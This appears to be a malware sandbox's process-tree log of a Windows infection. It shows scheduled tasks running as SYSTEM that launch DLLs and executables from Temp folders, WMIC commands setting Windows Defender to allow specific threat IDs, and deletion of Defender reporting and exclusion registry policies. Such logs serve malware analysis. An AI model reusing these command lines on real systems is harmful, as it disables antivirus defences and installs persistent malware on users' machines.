C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OBEOfgleGlpbUoFbTOD2" /F /xml "C:\Program Files (x86)\iOPoQDDXUfpqC\yJNcEnN.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PvKMXtxeDKBRRtMew" /SC once /ST 03:29:09 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\laRuxdflOdEFherP\BRMSMEdP\SHbcZtW.dll\",#1 /site_id 394347" /V1 /F3⤵
- Creates scheduled task(s)
PID:4800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "PvKMXtxeDKBRRtMew"3⤵PID:3472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sputnifOwiaY" /SC once /ST 00:35:42 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\UYpqdsVz\qMMMIhS.exe\" JB /S"3⤵
- Creates scheduled task(s)
PID:5552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "sputnifOwiaY"3⤵PID:2640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "sputnifOwiaY"3⤵PID:2540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "sputnifOwiaY"3⤵PID:2228
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sKvAq1" /SC once /ST 02:10:58 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"3⤵
- Creates scheduled task(s)
PID:1680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "sKvAq1"3⤵PID:5468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "sKvAq1"3⤵PID:2444
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4664
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:7052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:3572
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1820
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fHOlMGNmDutpzGekG"3⤵PID:5584
-
-
-
C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\hVHJlIV.exeC:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\hVHJlIV.exe Nv /site_id 394347 /S2⤵PID:4144
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:6844
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:2684
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:4504
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:6308
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:3488
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:864
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:5884
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:3180
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:5564
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:3960
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:1380
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:5740
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:5580
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:456
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:5420
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:1316
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:4736
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bOoGaaDxESFbryPOAb"3⤵PID:7056
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4736
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4828
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:764
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dIBxqmZBU\ZRTsLy.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JnrJAucJILlcMMe" /V1 /F3⤵
- Creates scheduled task(s)
PID:1320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JnrJAucJILlcMMe2" /F /xml "C:\Program Files (x86)\dIBxqmZBU\iiJdgmu.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:5284
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JnrJAucJILlcMMe"3⤵PID:2324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JnrJAucJILlcMMe"3⤵PID:5788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OMsCZDeJImgVgl" /F /xml "C:\Program Files (x86)\fSairMrhYOPU2\vAOVTPM.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:4800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uZdEDCeaKQjVo2" /F /xml "C:\ProgramData\qLBAJgyZHGjWrPVB\xUEQNAD.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:4404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FNTeCqGkBmjmyLdgG2" /F /xml "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\JiPuRMh.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:3688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OBEOfgleGlpbUoFbTOD2" /F /xml "C:\Program Files (x86)\iOPoQDDXUfpqC\uBtcpfd.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PvKMXtxeDKBRRtMew" /SC once /ST 02:25:23 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\laRuxdflOdEFherP\jqjQMCXW\GxYInbi.dll\",#1 /site_id 394347" /V1 /F3⤵
- Creates scheduled task(s)
PID:5884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "PvKMXtxeDKBRRtMew"3⤵PID:3336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spugpnQcEsYA" /SC once /ST 04:00:25 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\OUoOAMiL\rqjwLsg.exe\" JB /S"3⤵
- Creates scheduled task(s)
PID:2340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spugpnQcEsYA"3⤵PID:5004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spugpnQcEsYA"3⤵PID:4212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spugpnQcEsYA"3⤵PID:4200
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:5460
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:5428
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:5604
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:5392
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fHOlMGNmDutpzGekG"3⤵PID:6848
-
-
-
C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\aWIJJiV.exeC:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\aWIJJiV.exe tt /site_id 668658 /S2⤵PID:2776
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:5336
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:3916
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:6264
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6384
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:3884
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:5868
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fHOlMGNmDutpzGekG" /SC once /ST 04:40:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\RZLrUru.exe\" Nv /site_id 668658 /S" /V1 /F3⤵
- Creates scheduled task(s)
PID:4636
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "fHOlMGNmDutpzGekG"3⤵PID:4516
-
-
-
C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\RZLrUru.exeC:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\RZLrUru.exe Nv /site_id 668658 /S2⤵PID:4000
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:2364
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6236
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6440
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:3344
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:4484
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:6484
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:1216
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:2764
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6812
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:368
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:4168
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:3680
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bOoGaaDxESFbryPOAb"3⤵PID:588
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:7028
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:4832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:7124
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:5864
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dIBxqmZBU\QDBucE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JnrJAucJILlcMMe" /V1 /F3⤵
- Creates scheduled task(s)
PID:6676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JnrJAucJILlcMMe2" /F /xml "C:\Program Files (x86)\dIBxqmZBU\FhrMzOl.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:4296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JnrJAucJILlcMMe"3⤵PID:2112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JnrJAucJILlcMMe"3⤵PID:5408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OMsCZDeJImgVgl" /F /xml "C:\Program Files (x86)\fSairMrhYOPU2\rDkFpXP.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:6800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uZdEDCeaKQjVo2" /F /xml "C:\ProgramData\qLBAJgyZHGjWrPVB\XZvwGuM.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:4136
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FNTeCqGkBmjmyLdgG2" /F /xml "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\vQyFfqZ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:7052
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OBEOfgleGlpbUoFbTOD2" /F /xml "C:\Program Files (x86)\iOPoQDDXUfpqC\lnxGDFP.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:6628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuLzeCuVtJp" /SC once /ST 03:22:39 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\HmOQMgkV\HOUTIvj.exe\" JB /S"3⤵
- Creates scheduled task(s)
PID:1560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuLzeCuVtJp"3⤵PID:4220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spuLzeCuVtJp"3⤵PID:4516
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spuLzeCuVtJp"3⤵PID:188
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:2364
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4124
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1280
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fHOlMGNmDutpzGekG"3⤵PID:6692
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\laRuxdflOdEFherP\BRMSMEdP\SHbcZtW.dll",#1 /site_id 3943472⤵PID:2696
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\laRuxdflOdEFherP\BRMSMEdP\SHbcZtW.dll",#1 /site_id 3943473⤵PID:5536
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PvKMXtxeDKBRRtMew"4⤵PID:6004
-
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\laRuxdflOdEFherP\BRMSMEdP\SHbcZtW.dll",#1 /site_id 3943472⤵PID:3432
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\laRuxdflOdEFherP\BRMSMEdP\SHbcZtW.dll",#1 /site_id 3943473⤵PID:5748
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PvKMXtxeDKBRRtMew"4⤵PID:6560
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:6256
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:3408
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B65C8615C0471B0E2FC7C7035F850EA0 C2⤵PID:5588
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FE519C208EA559425329E9C1543400C92⤵PID:1556
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:4504
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4C9752242731F9A448DF7103D081AD56 M Global\MSI00002⤵PID:2216
-
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True1⤵PID:4572
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True2⤵PID:652
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True3⤵PID:4700
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1352 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5488
-
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True1⤵PID:2232
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True2⤵PID:5396
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True3⤵PID:976
-
-
-
